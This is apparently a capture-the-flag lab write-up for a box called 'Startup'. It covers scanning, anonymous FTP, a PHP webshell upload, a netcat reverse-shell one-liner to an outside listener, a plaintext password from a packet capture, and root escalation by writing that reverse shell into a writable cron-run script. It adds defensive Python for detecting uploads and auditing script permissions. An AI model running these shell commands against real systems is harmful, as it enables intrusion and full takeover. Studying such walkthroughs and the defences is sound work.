# Startup

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbNn_u4STOlHTykgczS%2F-MbNw0kONNETUPrR8vt2%2Fimage.png?alt=media\&token=e015f4c2-52f5-4da4-b739-0b0d857982d7)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```bash
nmap -Pn 10.10.50.218
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOc1gzoNpNQY2on9jz%2Fimage.png?alt=media\&token=754e1e59-8738-4005-9127-162cb5178712)

Detailed nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p 21,22,80**: scan only ports 21, 22 and 80
* **-oN nmap**: save the output into a file called nmap

```bash
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.50.218
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOcN4Xc5irvSWMxYBQ%2Fimage.png?alt=media\&token=92c5e6a3-b525-4c3e-a3a4-2dea03155906)

## Enumeration

### Port 21: FTP

From the nmap scan we can see that anonymous login is allowed, so let's log in and see what we can find.

`Username: anonymous`

`Password: anonymous`

```bash
ftp 10.10.50.218
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOe_IHNdSNlj1tge45%2Fimage.png?alt=media\&token=33a47e05-bafd-4cbb-b41c-315420bc80c2)

Let's list the files on the server.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfZflKyYEqD_OyBD4%2Fimage.png?alt=media\&token=a4685888-5314-4b3f-8974-56ad74f4350e)

There is a directory and 3 files; let's get the files first and then see what is in the directory.

```bash
get <file-name>
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOeur5gHrIgbLt_K20%2Fimage.png?alt=media\&token=c51dded2-1ecc-47a5-814b-5748250e4865)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOff3ZtEINEoRF2C2l%2Fimage.png?alt=media\&token=2a1941a9-bd37-42e0-a6f1-d05aa1eff406)

Now let's cd into the ftp directory and check for files.

```bash
cd ftp
ls -la
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfQrTCaEP8B-P6Edm%2Fimage.png?alt=media\&token=f95c1b87-3ed7-4366-b904-426683046cd1)

Looks like there is nothing in the directory. Now let's get back to our machine and read the files.

```bash
cat notice.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfrVt4BqbYNIJvAIx%2Fimage.png?alt=media\&token=7b1255a7-c104-4913-a649-e08462a2f7db)

We now have a possible username, `Maya`, so let's add that to our notes.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOg6EG9-8Et-p1N55t%2Fimage.png?alt=media\&token=3beadd58-4a43-4acf-9800-f55bbc1fd774)

The image does not contain anything interesting, but it does give us something to think about :)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOgSpK4_c3DkBS_b6V%2Fimage.png?alt=media\&token=5cc732b5-52e4-4b27-a242-e50c6a4dccb7)

There is nothing in `.test.log` either.

```bash
cat .test.log
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOlGU0Mds2bT7r0ggN%2Fimage.png?alt=media\&token=1b6e416e-2f4c-4b65-baf4-12d1199344ba)

Looks like that is all we get from FTP.

### Port 80: HTTP

Let's visit the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOj0J_pOL3y_8SjBiY%2Fimage.png?alt=media\&token=b85512b2-a5b4-4859-ba86-50813045996c)

Let's look at the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOk1utHI-uAnK_O3k9%2Fimage.png?alt=media\&token=88929c9e-2a1d-48c5-a640-d30f6ae22ca8)

Nothing of interest. Let's use gobuster to find hidden directories.

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.50.218/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOkjv8RWb-gJW4FfwE%2Fimage.png?alt=media\&token=7affc7a4-e62c-49a9-b0aa-09aba9ec1b7a)

We found a directory called `/files`; let's visit it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOkqKxH8kFFUojuPRu%2Fimage.png?alt=media\&token=f9ce6a58-eb48-4ef0-bb95-3bf33cc60f3b)

Looks like the same files we found in the FTP server.

## Exploitation

Looking at the ftp directory on the FTP server, we had permission to write into it, and the same directory is served by the web server. That means we can upload a webshell over FTP and then reach it through the web page.

We can use [this](https://github.com/artyuum) webshell for that. Copy its index.php (which I renamed to `web.php`) into the `/Startup` working directory, then log in through FTP and cd into the ftp directory.

Now upload the file into the directory using the put command:

```bash
put web.php
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOp16c0Ouh-NwTKpv1%2Fimage.png?alt=media\&token=4534bf75-9a76-499e-be39-b4dc8e09f359)

Now that we have added `web.php` to the directory, let's visit it on the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOphoHj8s2S5aE0Yj0%2Fimage.png?alt=media\&token=696ceabc-1a59-48c3-a089-481d3a70a484)
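On the defender's side, an upload like the one above lands in vsftpd's transfer log. As an added example that is not part of this writeup, here is a Python check over constructed log lines (vsftpd's native log format is assumed) that flags successful anonymous uploads and rates server-side script files highest, because this FTP tree is also served under `/files` on the web server:

```python
import re

# Pattern for vsftpd's native log format (assumed; the sample below is constructed, not from the box).
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>UPLOAD|DOWNLOAD): Client "(?P<client>[^"]+)", '
    r'"(?P<path>[^"]+)", (?P<size>\d+) bytes'
)
ANON_USERS = {"ftp", "anonymous"}          # names vsftpd uses for anonymous sessions (assumption)
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")

def parse_transfer(line):
    """Return the fields of a transfer line, or None for logins and other noise."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def flag_anonymous_uploads(lines):
    """Flag successful anonymous uploads: script files get 'high', anything else 'medium'.
    On this box the FTP tree is served as /files/ over HTTP, so any anonymous write is a
    finding and a server-side script is a code-execution path."""
    findings = []
    for line in lines:
        rec = parse_transfer(line)
        if not rec or rec["status"] != "OK" or rec["action"] != "UPLOAD":
            continue
        if rec["user"] not in ANON_USERS:
            continue
        severity = "high" if rec["path"].lower().endswith(SCRIPT_EXTS) else "medium"
        findings.append({"ts": rec["ts"], "client": rec["client"],
                         "path": rec["path"], "severity": severity})
    return findings

# Constructed sample log: one anonymous script upload, one harmless anonymous upload,
# one authenticated upload and one failed attempt.
SAMPLE_LOG = """\
Mon Jun 21 10:14:02 2021 [pid 2011] [ftp] OK LOGIN: Client "10.13.8.64", anon password "anonymous"
Mon Jun 21 10:14:20 2021 [pid 2013] [ftp] OK DOWNLOAD: Client "10.13.8.64", "/notice.txt", 150 bytes, 4.21Kbyte/sec
Mon Jun 21 10:15:10 2021 [pid 2013] [ftp] OK UPLOAD: Client "10.13.8.64", "/ftp/hello.txt", 12 bytes, 0.30Kbyte/sec
Mon Jun 21 10:16:05 2021 [pid 2013] [ftp] OK UPLOAD: Client "10.13.8.64", "/ftp/web.php", 1098 bytes, 9.87Kbyte/sec
Mon Jun 21 10:17:44 2021 [pid 2020] [lennie] OK UPLOAD: Client "10.10.1.5", "/ftp/report.txt", 42 bytes, 0.50Kbyte/sec
Mon Jun 21 10:18:01 2021 [pid 2021] [ftp] FAIL UPLOAD: Client "10.13.8.64", "/ftp/test.php", 0 bytes, 0.00Kbyte/sec
"""

if __name__ == "__main__":
    for f in flag_anonymous_uploads(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['ts']}  {f['client']}  {f['path']}")
```

The fix on the server side is to stop anonymous writes (vsftpd's `anon_upload_enable` and `write_enable`) or, at minimum, to keep the FTP root out of the web server's document root.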

Now we can run commands through the webshell. Let's get a reverse shell; the command is taken from [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
```

We also have to start a netcat listener:

```bash
nc -lvnp 1234
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOq9ZgihPjgx-7rx3A%2Fimage.png?alt=media\&token=3ca24085-4f29-4997-a264-55034c86899c)

Now we run the command in the webshell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqERbXVBKZECJMq9V%2Fimage.png?alt=media\&token=392e700d-c5ea-4325-ab67-e57a3f7aaa0b)

Once you do, you get a reverse shell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqJS6XkQV-3W4KZjz%2Fimage.png?alt=media\&token=e99a79b5-bb10-42ec-b123-b1d3a038bda4)

Once in the box, use these commands to stabilize the shell:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqvBXggQa8OOcy0d8%2Fimage.png?alt=media\&token=eaa25d1f-5163-47b5-8ceb-07622c30fcb3)

Looking through the directories, one unusual directory stands out: `/incidents`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOqwdzdr3AoSEg8wEe%2F-MbOrLdPLKVsmqd688uK%2Fimage.png?alt=media\&token=c8ff2566-4c63-4ec9-bf0f-3256035d44d7)

It has a pcapng file, so let's try to get information from it. First we need to copy it to the ftp directory so that we can download it from the website.

```bash
cp suspicious.pcapng /var/www/html/files/ftp/
```

Once we do this, we can download the file from the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOrrBNiGr2WrThSp2T%2F-MbOs6J8kNkFLLUBa50D%2Fimage.png?alt=media\&token=3510bb17-fde4-4b27-aaf0-19c869645584)

Once downloaded, you can open it with `Wireshark` using this command:

```bash
wireshark suspicious.pcapng
```

After you run this command, Wireshark opens the capture.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOrrBNiGr2WrThSp2T%2F-MbOsr23TlEtbbL-KCon%2Fimage.png?alt=media\&token=223e7179-f6df-419c-80c5-81d8d09a89ec)

Following a TCP stream, we come across something interesting: a password.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOve4Stf5m5r3lwEzE%2Fimage.png?alt=media\&token=bd73df5a-4cd8-4fc0-a2d8-2965dde0a7a5)

Let's try this password, `c4ntg3t3n0ughsp1c3`, to switch to the user `Lennie` on the machine:

```bash
su lennie
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOw-XYDkmalFyVzw2O%2Fimage.png?alt=media\&token=8ef84e1f-3c2e-44dd-9037-5486b08a83dd)

Looks like we are now Lennie. We can read `user.txt` now.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOwAYBvRHsfjbKzLHC%2Fimage.png?alt=media\&token=5e2a369f-6d3c-40ba-9170-9013d9fb7872)

Looking at the starting directory, we also find another interesting file called `/recipe.txt`; let's read that.

```bash
cat recipe.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOx2AC_ALbcRhQnoTy%2Fimage.png?alt=media\&token=e50ba7d7-64f3-46c4-b586-57f81c379d72)

This is the answer to the first question of the room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOx7is1xGb8sZuA-bY%2Fimage.png?alt=media\&token=9a156e1f-0d2e-44f4-91c8-6a90068421cf)

## Privilege Escalation

We see a file called `planner.sh` in the `/scripts` directory in Lennie's home directory. Let's read it.

```bash
cat planner.sh
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOzNXq_a2BHnXD7GPz%2Fimage.png?alt=media\&token=9cd6a2fe-c1b9-45b0-bd4c-82840928b0f1)

It executes a file called `/etc/print.sh`; let's read that file.

```bash
cat /etc/print.sh
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOzmp7cd8cmwdmfuPP%2Fimage.png?alt=media\&token=66abfd04-3db5-4e0b-ab9f-a8ff76ef2586)

It is a bash script that prints `Done!`. What if we echo a reverse shell into it and listen on our machine? Would that give us root? Let's try it out.

We can reuse the reverse shell command from before and echo it into the file:

```bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" > /etc/print.sh
```

Also make sure you have started a netcat listener; after a while, you get a reverse shell as root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbP-zGWS8RkZnl2erQP%2Fimage.png?alt=media\&token=13f14c50-bb60-4250-9fae-87223a45885b)
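The root shell arrives because a script that root runs on a schedule (`planner.sh`) hands control to a second script (`/etc/print.sh`) that an unprivileged user can edit. As an added example that is not part of this writeup, here is a Python audit that follows a root-run script into the scripts it references and reports every link a non-root user can modify; it builds a constructed copy of the chain in a temp directory rather than touching the box, and the reference-finding regex is an assumption:

```python
import os, re, stat, tempfile

# Heuristic for absolute .sh paths referenced inside a script body (assumption: good enough here).
SCRIPT_REF_RE = re.compile(r'(?<![\w/])(/[\w./-]+\.sh)\b')

def loose_permissions(path):
    """Reasons a non-root user could change a file that root is about to execute."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("writable by a non-root group")
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    return reasons

def audit_script_chain(script, seen=None):
    """Follow a root-run script into every script it references; return [(path, reasons)]
    for each link in the chain that a non-root user can edit."""
    seen = set() if seen is None else seen
    findings = []
    if script in seen or not os.path.isfile(script):
        return findings
    seen.add(script)
    reasons = loose_permissions(script)
    if reasons:
        findings.append((script, reasons))
    with open(script, errors="replace") as fh:
        refs = SCRIPT_REF_RE.findall(fh.read())
    for ref in refs:
        findings.extend(audit_script_chain(ref, seen))
    return findings

def build_demo_chain():
    """Constructed stand-in for the box (temp dir): planner.sh runs a print.sh anyone can edit."""
    d = tempfile.mkdtemp(prefix="cronaudit-")
    print_sh, planner_sh = os.path.join(d, "print.sh"), os.path.join(d, "planner.sh")
    with open(print_sh, "w") as fh:
        fh.write("#!/bin/bash\necho 'Done!'\n")
    os.chmod(print_sh, 0o777)                      # the weak setting: world-writable
    with open(planner_sh, "w") as fh:
        fh.write(f"#!/bin/bash\n/bin/bash {print_sh}\n")
    os.chmod(planner_sh, 0o755)                    # the corrected setting: only the owner writes
    return planner_sh, print_sh

if __name__ == "__main__":
    for path, why in audit_script_chain(build_demo_chain()[0]):  # on a real host: the cron entry's script
        print(f"{path}: {', '.join(why)}")
```

The mitigation is the same for every link in the chain: scripts that root executes must be owned by root and writable only by root (`chmod 755`, `chown root:root`).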

You can now read the `root.txt` flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbP0-mqMHTCDddI8HiO%2F-MbP08-C-6NwbF5VAQBK%2Fimage.png?alt=media\&token=79a34485-5e29-463c-93d0-3fe8aafcdd96)
